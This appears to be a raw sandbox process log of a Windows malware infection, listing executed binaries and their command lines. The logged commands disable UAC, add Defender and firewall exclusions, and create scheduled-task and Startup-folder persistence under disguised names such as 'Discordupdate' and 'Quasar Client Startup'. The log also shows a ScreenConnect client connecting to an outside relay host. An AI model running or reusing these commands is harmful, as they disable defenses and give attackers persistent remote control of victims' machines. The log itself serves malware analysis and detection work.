C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding

C:\Users\Admin\AppData\Local\Temp\a\36.exe

"C:\Users\Admin\AppData\Local\Temp\a\36.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 156

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpE189.tmp.bat""

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Local\Temp\a\99999.exe

"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"

C:\Users\Admin\AppData\Local\Temp\a\22.exe

"C:\Users\Admin\AppData\Local\Temp\a\22.exe"

C:\Users\Admin\AppData\Roaming\server.exe

"C:\Users\Admin\AppData\Roaming\server.exe"

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe

"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"

C:\Users\Admin\AppData\Local\Temp\a\Network.exe

"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 684

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005B4" "00000000000003E0"

C:\Users\Admin\AppData\Local\Temp\a\rea.exe

"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force

C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe

"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AclqLgFB8I0B.bat" "

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE62.tmp"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 8BD0D7494D24BA86F55F18A3C1C05FB6

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp10A5.tmp"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 41A763ADD0F1DF3212DC42565CDD272C M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=64840446-9df6-4c65-8411-6e7dc5c317a5&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "33ae33d0-0a18-44cf-9eee-21fa31a09983" "User"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"

C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe

"C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe" "RunRole" "6908b49c-ba33-40d9-a062-3d98cb504da9" "System"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe

"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"

C:\Users\Admin\AppData\Local\Temp\a\mod.exe

"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"

C:\Users\Admin\AppData\Local\Temp\a\Server.exe

"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"

C:\Users\Admin\AppData\Local\Temp\a\Client.exe

"C:\Users\Admin\AppData\Local\Temp\a\Client.exe"

C:\Users\Admin\AppData\Local\Temp\a\jij.exe

"C:\Users\Admin\AppData\Local\Temp\a\jij.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\a\333.exe

"C:\Users\Admin\AppData\Local\Temp\a\333.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\csGMovlsCz1U.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat" "

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gGd6Sc0CVxKo.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {84918601-C221-4502-93B5-1C459B54D35C} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\txmSbpHR1z93.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "651472643-1851480589-1118793646175173931221757700610928288111902706164902750728"

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zE5EsdTQVLTE.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hrQrQWtmNAup.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "933312609-406731408-1790982925-15858158391545171218-1087195369-874683945-276761312"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\H0JK71MDoDiA.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat" "

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe

"C:\Users\Admin\AppData\Local\Temp\a\CondoGenerator.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe

"C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-380592931794380694-599577954-1813269182775463150-1857120456-12712435401267113664"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe

"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe

"C:\Users\Admin\AppData\Local\Temp\a\Wallet-PrivateKey.Pdf.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1075484357-329037004-210092016729264460814665411141886277669-3823256481606935560"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 1164

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Users\Admin\AppData\Roaming\Network.exe

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Pdf%20Reader.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe

"C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1172

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\a\ogpayload.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe

"C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks" /create /tn "Windows Defender Startup Scan" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 1460

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\a\Servers.exe

"C:\Users\Admin\AppData\Local\Temp\a\Servers.exe"

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\system32\Windows Shell Interactive.exe

"C:\Windows\system32\Windows Shell Interactive.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "5483645295594997681410652334-1960867418-73037143113541422541004129646-983109749"

C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe

"C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f

C:\Windows\system32\dll32\msinfo32.exe

"C:\Windows\system32\dll32\msinfo32.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat" "

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat" "

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe

"C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe"

C:\Windows\SysWOW64\cmd.exe

